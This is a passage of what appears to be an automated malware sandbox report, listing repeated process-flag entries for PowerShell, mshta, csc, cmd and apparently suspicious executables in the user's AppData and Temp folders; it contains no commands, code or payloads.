          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
